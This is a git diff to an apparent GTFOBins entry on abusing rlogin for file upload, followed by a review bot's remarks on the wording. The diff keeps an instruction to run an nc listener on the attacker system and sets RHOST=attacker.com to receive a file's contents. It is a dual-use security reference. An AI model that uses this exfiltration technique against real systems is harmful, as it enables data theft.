diff --git a/_gtfobins/rlogin.md b/_gtfobins/rlogin.md index 5b1d393..8e17f30 100644 --- a/_gtfobins/rlogin.md +++ b/_gtfobins/rlogin.md @@ -1,7 +1,14 @@ --- +description: | + Usually `rlogin` is a symlink to `ssh`, the following works only when the *real* `rlogin` is used (e.g., from the `rsh-client` APT package). functions: file-upload: - - description: Send contents of a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker system to capture the contents. + - description: | + Send contents of a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker system to capture the contents. + + `rlogin` hangs waiting for the remote peer to close the socket. + + The file is corrupted by leading and trailing spurious data. code: | RHOST=attacker.com RPORT=12345
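Review bot: The added sentence "The file is corrupted by leading and trailing spurious data." in the `file-upload` description states the problem without saying what the extra bytes are or whether the original content survives intact between them. Since the entry is filed under `file-upload`, document what surrounds the payload (if known) and whether the capture can be trimmed back to the original file, so a reader can tell if this is usable for anything beyond text. Two smaller points: the new top-level `description` has a comma splice, and "Usually `rlogin` is a symlink to `ssh`; the following works only when the *real* `rlogin` is used" reads more cleanly. The line "`rlogin` hangs waiting for the remote peer to close the socket." would also be more useful if it said what the reader should do about it.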